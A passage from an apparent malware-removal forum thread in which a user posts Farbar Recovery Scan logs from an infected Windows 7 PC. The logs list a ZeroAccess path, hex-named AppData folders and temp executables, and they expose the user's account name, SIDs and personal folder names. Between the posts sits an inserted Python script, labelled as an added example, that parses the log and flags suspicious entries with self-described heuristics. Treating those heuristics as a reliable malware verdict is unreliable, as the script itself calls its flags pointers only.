2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-03-15 19:42 - 2017-02-09 12:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-03-15 19:42 - 2017-02-09 12:03 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-03-15 19:42 - 2017-02-09 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-03-15 19:42 - 2017-02-09 12:00 - 03220480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-03-15 19:42 - 2017-02-09 11:59 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-03-15 19:42 - 2017-02-09 11:58 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-03-15 19:42 - 2017-02-09 11:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-03-15 19:42 - 2017-02-09 11:55 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-03-15 19:42 - 2017-02-09 11:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-03-15 19:42 - 2017-02-09 11:54 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-03-15 19:42 - 2017-02-09 11:54 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-03-15 19:42 - 2017-02-09 11:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-03-15 19:42 - 2017-02-09 11:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2017-03-15 19:42 - 2017-02-09 11:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-03-15 19:42 - 2017-02-09 11:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-03-15 19:42 - 2017-02-09 11:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-03-15 19:42 - 2017-02-09 11:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-03-15 19:42 - 2017-02-09 11:49 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 10:06 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-15 19:42 - 2017-02-09 10:06 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-15 19:42 - 2017-02-06 12:14 - 00733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-15 19:42 - 2017-01-13 14:00 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-03-15 19:42 - 2017-01-13 14:00 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2017-03-15 19:42 - 2017-01-13 13:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-03-15 19:42 - 2017-01-13 13:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2017-03-15 19:42 - 2017-01-11 14:01 - 01887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-15 19:42 - 2017-01-11 14:01 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2017-03-15 19:42 - 2017-01-11 13:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-03-15 19:42 - 2017-01-11 13:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2017-03-15 19:42 - 2017-01-06 14:00 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-03-15 19:42 - 2017-01-06 13:44 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-03-15 19:38 - 2017-02-22 19:42 - 00084712 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-03-15 19:38 - 2017-02-22 19:37 - 01285632 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-03-15 19:38 - 2017-02-18 10:05 - 01609216 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-03-15 19:38 - 2017-02-18 10:05 - 00646656 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-03-15 06:10 - 2017-03-15 06:10 - 00003128 _____ C:\Windows\System32\Tasks\DRScanner Startup
2017-03-15 06:10 - 2017-03-15 06:10 - 00002038 _____ C:\Users\Public\Desktop\HouseCall for Home Networks.lnk
2017-03-15 06:10 - 2017-03-15 06:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HouseCall for Home Networks
2017-03-15 06:10 - 2017-03-15 06:10 - 00000000 ____D C:\Program Files\WinPcap
2017-03-14 15:49 - 2017-03-14 15:49 - 00000000 ____D C:\Windows\Trend Micro
2017-03-14 15:44 - 2017-03-14 15:44 - 02527376 _____ (Trend Micro Inc.) C:\Users\KEKLR\Downloads\HousecallLauncher64 (1).exe
2017-03-14 15:42 - 2017-03-14 15:42 - 02527376 _____ (Trend Micro Inc.) C:\Users\KEKLR\Downloads\HousecallLauncher64.exe
2017-03-14 14:53 - 2017-03-14 14:53 - 00073600 _____ C:\Users\KEKLR\Documents\Oklahoma’s Deadliest Tornado-3.pdf
2017-03-14 14:17 - 2017-03-14 14:18 - 00073594 _____ C:\Users\KEKLR\Downloads\Oklahoma’s Deadliest Tornado.pdf
2017-03-14 14:07 - 2017-03-14 14:07 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-03-14 14:07 - 2017-03-14 14:07 - 00002047 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2017-03-14 13:49 - 2017-03-14 13:49 - 01204344 _____ (Adobe Systems Incorporated) C:\Users\KEKLR\Downloads\readerdc_en_xa_install.exe
2017-03-12 19:38 - 2017-03-12 19:39 - 02822778 _____ C:\Users\KEKLR\Downloads\Attachments_2017312.zip
2017-03-11 14:42 - 2017-03-11 14:42 - 00108087 _____ C:\Users\KEKLR\Downloads\Special Topics Books(1).pdf
2017-03-11 14:38 - 2017-03-11 14:38 - 00111570 _____ C:\Users\KEKLR\Downloads\Petrology Book(1).pdf


Edited by krtate, 08 April 2017 - 03:20 PM.
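The FRST output above is easier to triage by machine than by eye: each file line has the fixed shape "created - modified - size flags (company) path", and each service/driver line has the shape "start-type name; image path [details]". The following script is an added example and is not part of the original post, nor is it a tool shipped by Farbar or Malwarebytes. It parses those two line formats and pulls out two things a helper would normally look at first: directories under AppData\Local whose names are random-looking hex strings (the b3751cf7 and fc867bd779 entries in the log above are the kind of thing it flags), and drivers or services whose image file FRST could not find ("[X]" or "no ImagePath"). The regular expressions, the hex-name heuristic and the sample lines (copied from the post's own log into a constructed string so the script runs offline) are all assumptions of this example; a flag from it is a pointer for further inspection, not a verdict.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: a few lines copied from the FRST output posted above
# (driver section and "One Month Modified" section), so the script runs offline.
SAMPLE_LOG = r"""
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U4 eabfiltr; no ImagePath
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
2017-04-08 12:53 - 2014-05-16 06:41 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
2017-03-14 14:09 - 2014-08-22 07:59 - 00000000 ____D C:\Users\KEKLR\AppData\Local\Adobe
"""

# FRST file line: "<created> - <modified> - <size> <flags> [(<company>) ]<path>"
# (regex is an assumption of this example, written from the lines in the post)
FILE_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - (\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(\d+) ([_A-Z]{5}) (?:\(([^)]*)\) )?(.+)$"
)
# FRST service/driver line: "<start type> <name>; <image path and details>"
DRIVER_RE = re.compile(r"^([RSU]\d) (\S+); (.*)$")
# Heuristic: a name made only of lowercase hex digits, e.g. "b3751cf7"
HEX_NAME_RE = re.compile(r"[0-9a-f]{6,}")


@dataclass
class FileEntry:
    created: str
    modified: str
    size: int
    flags: str          # five-character attribute field, e.g. "____D" or "___SD"
    company: Optional[str]
    path: str

    @property
    def is_dir(self) -> bool:
        return "D" in self.flags


@dataclass
class DriverEntry:
    start: str          # R = running, S = stopped, U = unknown, plus start type digit
    name: str
    detail: str

    @property
    def image_missing(self) -> bool:
        # FRST marks an unresolvable image path with "[X]" or "no ImagePath".
        return "[X]" in self.detail or "no ImagePath" in self.detail


def parse_file_entry(line: str) -> Optional[FileEntry]:
    m = FILE_RE.match(line.strip())
    if not m:
        return None
    created, modified, size, flags, company, path = m.groups()
    return FileEntry(created, modified, int(size), flags, company, path)


def parse_driver_entry(line: str) -> Optional[DriverEntry]:
    m = DRIVER_RE.match(line.strip())
    return DriverEntry(*m.groups()) if m else None


def looks_random_hex(name: str) -> bool:
    """Heuristic only: legitimate software occasionally uses such names too."""
    return HEX_NAME_RE.fullmatch(name) is not None


def triage(log_text: str) -> Dict[str, List[str]]:
    """Return hex-named AppData\\Local directories and drivers with a missing image."""
    hex_dirs: List[str] = []
    missing: List[str] = []
    for line in log_text.splitlines():
        f = parse_file_entry(line)
        if f is not None:
            leaf = f.path.split("\\")[-1]
            if f.is_dir and "AppData\\Local" in f.path and looks_random_hex(leaf):
                hex_dirs.append(f.path)
            continue
        d = parse_driver_entry(line)
        if d is not None and d.image_missing:
            missing.append(d.name)
    return {"hex_appdata_dirs": hex_dirs, "missing_image_drivers": missing}


if __name__ == "__main__":
    for key, items in triage(SAMPLE_LOG).items():
        print(key)
        for item in items:
            print("  ", item)
```

Run it against a saved FRST.txt by replacing SAMPLE_LOG with the file contents; lines that match neither pattern (section headers, the "(If an entry is included in the fixlist ...)" notes) are simply skipped. The hex-name test is deliberately narrow so it stays useful on a real log: vendor directories such as Adobe or Mozilla are not flagged, and anything it does flag should be checked by listing the directory's contents and file hashes before it goes into a fixlist.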


#2 krtate

Posted 08 April 2017 - 03:20 PM

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-08 13:56 - 2016-10-16 19:56 - 00000911 _____ C:\Windows\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job
2017-04-08 13:56 - 2016-10-16 19:56 - 00000725 _____ C:\Windows\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job
2017-04-08 13:56 - 2009-07-14 01:32 - 00000000 ____D C:\Windows\system32\FxsTmp
2017-04-08 13:51 - 2016-11-24 19:27 - 00000000 ____D C:\Users\KEKLR\AppData\LocalLow\Mozilla
2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
2017-04-08 13:20 - 2015-04-25 11:35 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-04-08 13:13 - 2009-08-09 03:51 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-04-08 13:00 - 2009-07-14 00:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-08 13:00 - 2009-07-14 00:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-08 12:53 - 2014-05-16 06:41 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-08 12:50 - 2010-01-02 05:15 - 00000189 _____ C:\ProgramData\HPWALog.txt
2017-04-08 12:48 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-08 12:45 - 2010-03-09 18:28 - 00000000 ____D C:\Users\KEKLR\Documents\Mitchell Family 2009
2017-04-08 12:39 - 2010-01-19 08:35 - 00000000 ____D C:\Program Files (x86)\Trend Micro
2017-04-08 12:32 - 2011-12-25 21:27 - 08846941 _____ C:\Users\KEKLR\AppData\Local\census.cache
2017-04-08 12:28 - 2011-12-25 21:27 - 00126206 _____ C:\Users\KEKLR\AppData\Local\ars.cache
2017-04-08 10:52 - 2012-08-13 00:24 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-08 10:51 - 2012-08-13 00:24 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-07 18:06 - 2010-01-02 05:19 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-04-04 06:58 - 2017-01-31 19:16 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForKEKLR.job
2017-04-03 21:39 - 2011-01-13 09:53 - 00000000 ____D C:\Users\KEKLR\Documents\Moms cards sayings
2017-04-03 20:23 - 2017-01-31 19:16 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForKEKLR
2017-04-02 19:19 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2017-04-02 18:18 - 2016-11-23 10:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-02 18:18 - 2012-04-30 06:20 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-25 12:46 - 2009-07-14 01:13 - 00788704 _____ C:\Windows\system32\PerfStringBackup.INI
2017-03-25 12:46 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf
2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
2017-03-22 06:47 - 2016-06-08 18:17 - 00000000 ____D C:\Users\KEKLR\Documents\DigiStamps
2017-03-19 20:14 - 2009-07-14 00:45 - 00464288 _____ C:\Windows\system32\FNTCACHE.DAT
2017-03-19 20:13 - 2015-02-20 18:53 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-03-19 20:13 - 2015-02-20 18:53 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2017-03-19 20:10 - 2014-12-10 15:46 - 00000000 ____D C:\Windows\system32\appraiser
2017-03-19 20:10 - 2014-05-06 13:32 - 00000000 ___SD C:\Windows\system32\CompatTel
2017-03-19 20:10 - 2009-07-14 01:32 - 00000000 ____D C:\Program Files\DVD Maker
2017-03-19 19:45 - 2013-07-27 22:12 - 00000000 ____D C:\Windows\system32\MRT
2017-03-17 06:39 - 2010-01-03 15:16 - 138634176 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-03-17 06:32 - 2015-02-20 18:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-03-14 14:50 - 2015-07-10 05:57 - 02244280 _____ C:\Users\KEKLR\Documents\AdobeAcroCleaner_DC2015.exe
2017-03-14 14:09 - 2014-08-22 07:59 - 00000000 ____D C:\Users\KEKLR\AppData\Local\Adobe
2017-03-14 14:08 - 2015-05-13 20:23 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-03-14 12:31 - 2014-05-22 19:38 - 00000000 ____D C:\Users\KEKLR\Documents\Taylor Tax
2017-03-14 08:46 - 2012-03-29 09:12 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-03-14 08:46 - 2012-03-29 09:12 - 00004312 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-03-14 08:46 - 2011-05-19 12:44 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-03-14 08:45 - 2012-01-05 06:12 - 00000000 ____D C:\Windows\system32\Macromed
2017-03-14 08:45 - 2009-08-09 03:40 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-03-11 14:58 - 2014-05-22 19:25 - 00000000 ____D C:\Users\KEKLR\Documents\Bloomsburg

==================== Files in the root of some directories =======

2014-11-13 10:45 - 2014-11-13 10:45 - 6000640 _____ () C:\Program Files (x86)\GUTAF36.tmp
2011-03-24 19:07 - 2011-06-12 16:08 - 0001854 _____ () C:\Users\KEKLR\AppData\Roaming\GhostObjGAFix.xml
2010-01-13 12:03 - 2013-08-26 15:30 - 0001356 _____ () C:\Users\KEKLR\AppData\Roaming\wklnhst.dat
2011-12-25 21:27 - 2017-04-08 12:28 - 0126206 _____ () C:\Users\KEKLR\AppData\Local\ars.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\AtStart.txt
2011-12-25 21:27 - 2017-04-08 12:32 - 8846941 _____ () C:\Users\KEKLR\AppData\Local\census.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\DSwitch.txt
2010-05-03 10:28 - 2010-05-03 10:28 - 0000036 _____ () C:\Users\KEKLR\AppData\Local\housecall.guid.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\QSwitch.txt
2012-01-05 08:43 - 2012-01-05 09:26 - 0007598 _____ () C:\Users\KEKLR\AppData\Local\Resmon.ResmonCfg
2014-05-03 11:58 - 2014-05-03 11:58 - 0000010 _____ () C:\Users\KEKLR\AppData\Local\sponge.last.runtime.cache
2011-01-25 22:09 - 2011-01-25 22:09 - 0152028 _____ () C:\Users\KEKLR\AppData\Local\tmpIZZY%20ON%20TRAMPOLINE[1].0
2011-01-25 22:09 - 2011-01-25 22:09 - 0175047 _____ () C:\Users\KEKLR\AppData\Local\tmpIZZY%20ON%20TRAMPOLINE[1].JPG
2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
2013-09-01 17:00 - 2013-09-01 17:00 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-01-02 05:15 - 2017-04-08 12:50 - 0000189 _____ () C:\ProgramData\HPWALog.txt
2010-01-13 10:46 - 2016-11-23 07:48 - 0006069 _____ () C:\ProgramData\hpzinstall.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

ZeroAccess:
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}

Some files in TEMP:
====================
2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe

Some zero byte size files/folders:
==========================
C:\Windows\System32\igdumd32.dll
C:\Windows\System32\igdumdx32.dll
C:\Windows\System32\MFC71.DLL
C:\Windows\System32\MFC71U.DLL
C:\Windows\System32\MSVBVM60.DLL
C:\Windows\System32\MSVCP71.dll
C:\Windows\System32\MSVCR71.dll
C:\Windows\System32\olepro32.DLL

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-04-02 19:00

==================== End of FRST.txt ============================



#3 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 08 April 2017 - 03:32 PM

Ran by KEKLR (08-04-2017 14:12:54)
Running from C:\Users\KEKLR\Downloads
Windows 7 Home Premium Service Pack 1 (X64) (2010-01-02 09:06:14)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3698744866-2675293530-421701469-500 - Administrator - Disabled)
Guest (S-1-5-21-3698744866-2675293530-421701469-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3698744866-2675293530-421701469-1002 - Limited - Enabled)
KEKLR (S-1-5-21-3698744866-2675293530-421701469-1001 - Administrator - Enabled) => C:\Users\KEKLR

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activate Norton Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.1.20.0 - Symantec)
Administrative Medical Assisting, 6th Edition (HKLM-x32\...\Administrative Medical Assisting_is1) (Version:  - Cengage Learning)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.5.9.620 - Adobe Systems, Inc.)
Amazon Kindle (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Amazon Kindle) (Version:  - Amazon)
Bible Data Type System Files (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Camera Window DS (x32 Version: 5.2 - Canon) Hidden
